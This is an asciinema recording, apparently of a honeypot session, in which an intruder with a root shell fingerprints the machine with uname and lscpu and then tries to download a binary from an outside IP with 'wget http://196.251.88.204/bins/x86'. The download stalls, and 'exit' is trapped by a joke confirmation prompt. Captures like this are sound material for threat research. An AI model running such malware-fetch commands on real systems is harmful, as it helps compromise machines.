{"version": 2, "width": 80, "height": 24, "timestamp": 1762952553, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.066965, "o", "\u001b[?2004h\u001b]0;root@51637cda2a37: ~\u0007root@51637cda2a37:~# "]
[8.357852, "o", "\u001b[7muname -s -v -n -r -m\u001b[27m"]
[8.744096, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\buname -s -v -n -r -m\r\n\u001b[?2004l\r"]
[8.744314, "o", "Linux\r\n"]
[8.74439, "o", "\u001b[?2004h\u001b]0;root@51637cda2a37: ~\u0007root@51637cda2a37:~# "]
[11.265651, "o", "u"]
[11.397169, "o", "n"]
[11.557443, "o", "a"]
[11.670957, "o", "m"]
[11.757536, "o", "e"]
[11.849219, "o", " "]
[12.072931, "o", "-"]
[12.296358, "o", "a"]
[12.613755, "o", "\r\n\u001b[?2004l\r"]
[12.613895, "o", "Linux webapp-prod-01 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux\r\n\u001b[?2004h\u001b]0;root@51637cda2a37: ~\u0007root@51637cda2a37:~# "]
[14.974016, "o", "l"]
[15.171495, "o", "s"]
[15.53667, "o", "c"]
[15.722787, "o", "p"]
[15.966785, "o", "u"]
[17.126976, "o", "\r\n\u001b[?2004l\r"]
[17.12856, "o", "Architecture:                       x86_64\r\nCPU op-mode(s):                     32-bit, 64-bit\r\nAddress sizes:                      48 bits physical, 48 bits virtual\r\nByte Order:                         Little Endian\r\nCPU(s):                             128\r\nOn-line CPU(s) list:                0-127\r\nVendor ID:                          AuthenticAMD\r\nModel name:                         AMD EPYC 7763 64-Core Processor\r\nCPU family:                         25\r\nModel:                              1\r\nThread(s) per core:                 2\r\nCore(s) per socket:                 64\r\nSocket(s):                          1\r\nStepping:                           1\r\nFrequency boost:                    enabled\r\nCPU max MHz:                        3500.0000\r\nCPU min MHz:                        1500.0000\r\nBogoMIPS:                           4890.86\r\nFlags:                              fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 invpcid_single hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr rdpru wbnoinvd amd_ppin brs arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold v_vmsave_vmload vgif v_spec_ctrl umip pku ospke vaes vpclmulqdq rdpid overflow_recov succor smca fsrm\r\nVirtualization features:            \r\n  Virtualization:                   AMD-V\r\nCaches (sum of all):                \r\n  L1d:                              2 MiB (64 instances)\r\n  L1i:                              2 MiB (64 instances)\r\n  L2:                               32 MiB (64 instances)\r\n  L3:                               256 MiB (8 instances)\r\nNUMA:                               \r\n  NUMA node(s):                     1\r\n  NUMA node0 CPU(s):                0-127\r\nVulnerabilities:                    \r\n  Gather data sampling:             Not affected\r\n  Itlb multihit:                    Not affected\r\n  L1tf:                             Not affected\r\n  Mds:                              Not affected\r\n  Meltdown:                         Not affected\r\n  Mmio stale data:                  Not affected\r\n  Retbleed:                         Not affected\r\n  Spec rstack overflow:             Mitigation; safe RET\r\n  Spec store bypass:                Mitigation; Speculative Store Bypass disabled via prctl\r\n  Spectre v1:                       Mitigation; usercopy/swapgs barriers and __user pointer sanitization\r\n  Spectre v2:                       Mitigation; Retpolines, IBPB conditional, IBRS_FW, STIBP always-on, RSB filling, PBRSB-eIBRS Not affected\r\n  Srbds:                            Not affected\r\n  Tsx async abort:                  Not affected\r\n"]
[17.128797, "o", "\u001b[?2004h\u001b]0;root@51637cda2a37: ~\u0007root@51637cda2a37:~# "]
[31.87641, "o", "c"]
[31.931286, "o", "d"]
[32.092259, "o", " "]
[32.33133, "o", "/"]
[32.54388, "o", "\r\n\u001b[?2004l\r"]
[32.54408, "o", "\u001b[?2004h\u001b]0;root@51637cda2a37: /\u0007root@51637cda2a37:/# "]
[38.223888, "o", "\u001b[7mwget http://196.251.88.204/bins/x86\u001b[27m"]
[38.651076, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Cwget http://196.251.88.204/bins/x86\r\n\u001b[?2004l\r"]
[38.654205, "o", "--2025-11-12 13:03:12--  http://196.251.88.204/bins/x86\r\nConnecting to 196.251.88.204:80... "]
[46.45542, "o", "^C"]
[46.45584, "o", "\r\n"]
[46.45589, "o", "\u001b[?2004h"]
[46.456046, "o", "\u001b]0;root@51637cda2a37: /\u0007root@51637cda2a37:/# "]
[48.210082, "o", "e"]
[48.392894, "o", "x"]
[48.432237, "o", "i"]
[48.548629, "o", "t"]
[48.648992, "o", "\r\n\u001b[?2004l\r"]
[48.650167, "o", "Enter 'im not allowed to be here' to confirm: "]
[50.232563, "o", "\r\n"]
[50.232863, "o", "So indecisive...\r\n"]
[50.233815, "o", "Enter 'im not allowed to be here' to confirm: "]
[52.028247, "o", "^C"]
[52.028444, "o", "\r\n\u001b[?2004h\u001b]0;root@51637cda2a37: /opt\u0007root@51637cda2a37:/opt# "]
[54.0097, "o", "e"]
[54.207694, "o", "x"]
[54.285772, "o", "i"]
[54.480188, "o", "t"]
[54.679337, "o", "\r\n\u001b[?2004l\r"]
[54.680531, "o", "Enter 'im not allowed to be here' to confirm: "]
[55.157027, "o", "^C"]
[55.157215, "o", "\r\n\u001b[?2004h\u001b]0;root@51637cda2a37: /opt\u0007root@51637cda2a37:/opt# "]
[55.647789, "o", "D"]
[57.002674, "o", "\u0007"]
[58.240328, "o", "\b\u001b[K"]
[58.653169, "o", "\u001b[?2004l\r\r\nexit\r\n"]
